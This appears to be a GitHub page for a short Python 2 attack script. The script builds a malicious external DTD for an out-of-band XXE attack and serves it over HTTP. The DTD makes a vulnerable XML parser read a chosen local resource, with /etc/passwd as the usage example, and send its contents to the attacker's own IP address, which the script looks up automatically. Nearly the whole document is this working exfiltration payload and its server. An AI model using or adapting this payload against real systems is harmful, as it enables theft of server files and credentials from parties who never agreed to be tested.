Permalink
Fetching contributors…
Cannot retrieve contributors at this time
27 lines (23 sloc) 883 Bytes
#!/usr/bin/env python
##################################################
# XXE OOB HTTP Server hosting payload in DTD file
##################################################
from requests import get
import sys, os
def getIpAddress():
ip = get('https://api.ipify.org').text
return ip
if len(sys.argv) > 1:
resource = sys.argv[1]
XXEPayload = '''<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % payload SYSTEM "'''+resource+'''">
<!ENTITY % remote "<!ENTITY &#37; send SYSTEM 'http://'''+getIpAddress()+''':443/x?=%payload;'>
">
%remote;
%send;'''
open("data.dtd", "wb+").write(XXEPayload)
# Serving DTD file on port 80
os.system("python -m SimpleHTTPServer 80")
else:
print 'Usage : HTTPServer.py [protocol]://[host|directory]:[port]/[resource_name] \n\
Ex : python HTTPServer.py file:///etc/passwd\n\t\tpython HTTPServer.py http://127.0.0.1/'